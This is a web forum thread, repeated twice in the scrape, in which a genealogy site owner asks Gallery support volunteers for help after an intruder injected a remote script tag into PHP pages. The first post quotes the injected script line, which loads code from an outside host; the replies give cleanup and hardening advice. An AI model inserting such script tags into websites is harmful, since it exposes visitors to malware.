Security problem

manderly

Joined: 2008-04-04
Posts: 71

Posted: Wed, 2011-09-21 14:46

Hi,

Last week someone got into my gallery and put this line of code (<script language="javascript" src="http://admagnet1.com/?campaignid=12451598&type=tracking"></script>) at the bottom of the page in my index.php file and the main.php file....these are the ones that I know of...there might be more?

This bad link has now caused this error message listed below to pop up when people try to access my gallery...Google Chrome is the browser which produces this message...

"Warning: Something's Not Right Here!
www.illinoisancestors.org contains malware. Your computer might catch a virus if you visit this site."

I can remove the line of code but it keeps coming back. How can I prevent the hacker from continually putting the line back in the php files?

The hosting company ran a malware scan on my server and there isn't a problem. I also ran a deep scan for malware on my computer and it is clean as well.

My website is http://www.illinoisancestors.org/cemphotos/main.php
Gallery version = 2.3.1 core 1.3.0.1

thank you so very much for your help,
manderly

Dayo

Joined: 2005-11-04
Posts: 1642

Posted: Wed, 2011-09-21 15:12

Change all passwords associated with your site.
G2, ftp, control panel as well as passwords for any other applications you run with the same host.

However, the intruder has probably already left an access script sitting on your server and may not need the passwords any longer. So in addition to the change (still needed), you must verify each and every single file you have on the server to get rid of this.

G2 has a file integrity verification script to help with elements in the G2 folder. You will have to check other folders yourself. Run the G2 installer to Step 2 to activate the file integrity checks.

--
dakanji.com

manderly

Joined: 2008-04-04
Posts: 71

Posted: Thu, 2011-09-22 18:24

Hi,

Thank you for your helpful advice. I've changed all of my passwords.

heartfelt thanks,
manderly

floridave

Joined: 2003-12-22
Posts: 27300

Posted: Fri, 2011-09-23 02:13

Your host should be able to assist as well in doing an investigation.
You should also look at your files with Afro or your hosts file manager and see the date modified of files and do your own investigation.

Dave
_____________________________________________
Blog & G2 || floridave - Gallery Team

Dayo

Joined: 2005-11-04
Posts: 1642

Posted: Fri, 2011-09-23 04:59

manderly wrote:

I've changed all of my passwords.

You now need to check every file on the server.
Bear in mind that if you have more than one domain, you need to change every password and check every file on every one of the domains.

The next thing is that you should upgrade all applications and especially third party plugins for those to latest versions as he might be simply exploiting an application on your site. I believe G2.2.6+ should be fine but you are better off with G2.3.1.

If you are running something like Joomla, make sure third party plugins you use are not on their vulnerable extensions list.

Implement a firewall on your server. PHPIDS is a nice simple one.

--
dakanji.com

manderly

Joined: 2008-04-04
Posts: 71

Posted: Fri, 2011-09-23 13:06

Hi,

Thank you for your help!

What is Afro?

Since I have thousands of webpages, it will be hard to check them all. I do know the date when the files were modified. It would be great if a software program could search all the files and list the ones that were modified on a specific date.

My hosting company said they would only run a malware check on my dedicated server (they concluded the server was clean) and it's up to me to figure out what files were infected and how the intruder got in.

heartfelt thanks,
manderly

manderly

Joined: 2008-04-04
Posts: 71

Posted: Fri, 2011-09-23 13:12

Hi Dayo,

You're right...I forgot about my other domains...they were infected too...

If I get to the point when I think the site is clean again, should I notify Google of my efforts and ask for a review...so that the Google error message will be removed?

This is a silly question...I wonder if Google know what files were affected on my site or do they just check the index pages?

many thanks,
manderly

Dayo

Joined: 2005-11-04
Posts: 1642

Posted: Fri, 2011-09-23 13:50

When your sites are clean, Google will know when you inform them to check.

Follow this guide to clean your sites. There are no shortcuts.

http://25yearsofprogramming.com/blog/20070705.htm

If you do not throughly verify and clean out the sites as well as identify the original exploit or at least close all potential exploits, as sure as the sun will be up in the morning, the hacker will be back in and possibly enraged.

PS. BTW, this is not a G2 specific issue and it is highly unlikely that the exploit was through G2. As such, I'll advise you to post further queries on a server admin forum such as webhostingtalk.com.

PPS. This might help you scan for the modified files: http://www.cyberciti.biz/faq/howto-finding-files-by-date/. Note though that you have to close the original hole as well or else fixing/removing modified files will be futile.
--
dakanji.com

manderly

Joined: 2008-04-04
Posts: 71

Posted: Sat, 2011-09-24 23:20

Hi,

Thank you for your help...I'm sorry that I bother you...I have no where else to turn...

My gallery at http://www.illinoisancestors.org/cemphotos/main.php was definitely hacked into and it would impossible for me to find all the files which were modified on 9/15...the day I was hacked.

I though perhaps a command issued through "Cron Job" could identify all files which were modified on that day, but I have do idea how to do that...my level of expertise is dismal.

This security problem is way over my head...the only thing I can think of is to hire someone to look into my problem but I haven't found anyone who is interested in taking on the assignment...I'm desperate at this point...

thank you for everything,
manderly

floridave

Joined: 2003-12-22
Posts: 27300

Posted: Sun, 2011-09-25 01:16

FAQ: How can I make sure that my installation files are all intact?

Dave
___________________________________________
Blog & G2 || floridave - Gallery Team

Dayo

Joined: 2005-11-04
Posts: 1642

Posted: Sun, 2011-09-25 03:30

You should hire someone to do the job for you which is why I referred you to webhostingtalk. Take your sites offline, register there and ask for recommendations on a server admin.

Note that while your G2 installation was defaced, it is unlikely that this was the entry point to the server. This entry point is what needs to be identified as repairing anything without doing this first will be futile. As you noted, other domains were defaced as well. This is because the hacker can gain entry through one domain and then traverse to others to do as he wishes.

At this point, rather than focus on finding defaced files to fix, the key thing is finding out how the person got in at all.

Bear in mind that identifying the entry point requires reviewing the server logs and since these logs get rotated daily, every day spent without starting the task reduces the chances of conclusively doing so as the logs with the critical information might get rotated.

With the files modified ten days ago as you say, chances are high that the server logs have already been rotated in the interim since most tend to be on a 7-day cycle.

Go and hire the server admin right away. There are reputable ones on the webhostingtalk.com. The community there will give you pointers.

--
dakanji.com

manderly Joined: 2008-04-04 Posts: 71	Posted: Wed, 2011-09-21 14:46
	Hi, Last week someone got into my gallery and put this line of code (<script language="javascript" src="http://admagnet1.com/?campaignid=12451598&type=tracking"></script>) at the bottom of the page in my index.php file and the main.php file....these are the ones that I know of...there might be more? This bad link has now caused this error message listed below to pop up when people try to access my gallery...Google Chrome is the browser which produces this message... "Warning: Something's Not Right Here! www.illinoisancestors.org contains malware. Your computer might catch a virus if you visit this site." I can remove the line of code but it keeps coming back. How can I prevent the hacker from continually putting the line back in the php files? The hosting company ran a malware scan on my server and there isn't a problem. I also ran a deep scan for malware on my computer and it is clean as well. My website is http://www.illinoisancestors.org/cemphotos/main.php Gallery version = 2.3.1 core 1.3.0.1 thank you so very much for your help, manderly
	XUser login Username: * Password: * Create new account Request new password
Dayo Joined: 2005-11-04 Posts: 1642	Posted: Wed, 2011-09-21 15:12
	Change all passwords associated with your site. G2, ftp, control panel as well as passwords for any other applications you run with the same host. However, the intruder has probably already left an access script sitting on your server and may not need the passwords any longer. So in addition to the change (still needed), you must verify each and every single file you have on the server to get rid of this. G2 has a file integrity verification script to help with elements in the G2 folder. You will have to check other folders yourself. Run the G2 installer to Step 2 to activate the file integrity checks. -- dakanji.com

manderly Joined: 2008-04-04 Posts: 71	Posted: Thu, 2011-09-22 18:24
	Hi, Thank you for your helpful advice. I've changed all of my passwords. heartfelt thanks, manderly

floridave Joined: 2003-12-22 Posts: 27300	Posted: Fri, 2011-09-23 02:13
	Your host should be able to assist as well in doing an investigation. You should also look at your files with Afro or your hosts file manager and see the date modified of files and do your own investigation. Dave _____________________________________________ Blog & G2 \|\| floridave - Gallery Team

Dayo Joined: 2005-11-04 Posts: 1642	Posted: Fri, 2011-09-23 04:59
	manderly wrote: I've changed all of my passwords. You now need to check every file on the server. Bear in mind that if you have more than one domain, you need to change every password and check every file on every one of the domains. The next thing is that you should upgrade all applications and especially third party plugins for those to latest versions as he might be simply exploiting an application on your site. I believe G2.2.6+ should be fine but you are better off with G2.3.1. If you are running something like Joomla, make sure third party plugins you use are not on their vulnerable extensions list. Implement a firewall on your server. PHPIDS is a nice simple one. -- dakanji.com

manderly Joined: 2008-04-04 Posts: 71	Posted: Fri, 2011-09-23 13:06
	Hi, Thank you for your help! What is Afro? Since I have thousands of webpages, it will be hard to check them all. I do know the date when the files were modified. It would be great if a software program could search all the files and list the ones that were modified on a specific date. My hosting company said they would only run a malware check on my dedicated server (they concluded the server was clean) and it's up to me to figure out what files were infected and how the intruder got in. heartfelt thanks, manderly

manderly Joined: 2008-04-04 Posts: 71	Posted: Fri, 2011-09-23 13:12
	Hi Dayo, You're right...I forgot about my other domains...they were infected too... If I get to the point when I think the site is clean again, should I notify Google of my efforts and ask for a review...so that the Google error message will be removed? This is a silly question...I wonder if Google know what files were affected on my site or do they just check the index pages? many thanks, manderly

Dayo Joined: 2005-11-04 Posts: 1642	Posted: Fri, 2011-09-23 13:50
	When your sites are clean, Google will know when you inform them to check. Follow this guide to clean your sites. There are no shortcuts. http://25yearsofprogramming.com/blog/20070705.htm If you do not throughly verify and clean out the sites as well as identify the original exploit or at least close all potential exploits, as sure as the sun will be up in the morning, the hacker will be back in and possibly enraged. PS. BTW, this is not a G2 specific issue and it is highly unlikely that the exploit was through G2. As such, I'll advise you to post further queries on a server admin forum such as webhostingtalk.com. PPS. This might help you scan for the modified files: http://www.cyberciti.biz/faq/howto-finding-files-by-date/. Note though that you have to close the original hole as well or else fixing/removing modified files will be futile. -- dakanji.com

manderly Joined: 2008-04-04 Posts: 71	Posted: Sat, 2011-09-24 23:20
	Hi, Thank you for your help...I'm sorry that I bother you...I have no where else to turn... My gallery at http://www.illinoisancestors.org/cemphotos/main.php was definitely hacked into and it would impossible for me to find all the files which were modified on 9/15...the day I was hacked. I though perhaps a command issued through "Cron Job" could identify all files which were modified on that day, but I have do idea how to do that...my level of expertise is dismal. This security problem is way over my head...the only thing I can think of is to hire someone to look into my problem but I haven't found anyone who is interested in taking on the assignment...I'm desperate at this point... thank you for everything, manderly

floridave Joined: 2003-12-22 Posts: 27300	Posted: Sun, 2011-09-25 01:16
	FAQ: How can I make sure that my installation files are all intact? Dave ___________________________________________ Blog & G2 \|\| floridave - Gallery Team

Dayo Joined: 2005-11-04 Posts: 1642	Posted: Sun, 2011-09-25 03:30
	You should hire someone to do the job for you which is why I referred you to webhostingtalk. Take your sites offline, register there and ask for recommendations on a server admin. Note that while your G2 installation was defaced, it is unlikely that this was the entry point to the server. This entry point is what needs to be identified as repairing anything without doing this first will be futile. As you noted, other domains were defaced as well. This is because the hacker can gain entry through one domain and then traverse to others to do as he wishes. At this point, rather than focus on finding defaced files to fix, the key thing is finding out how the person got in at all. Bear in mind that identifying the entry point requires reviewing the server logs and since these logs get rotated daily, every day spent without starting the task reduces the chances of conclusively doing so as the logs with the critical information might get rotated. With the files modified ten days ago as you say, chances are high that the server logs have already been rotated in the interim since most tend to be on a 7-day cycle. Go and hire the server admin right away. There are reputable ones on the webhostingtalk.com. The community there will give you pointers. -- dakanji.com

Security problem

XUser login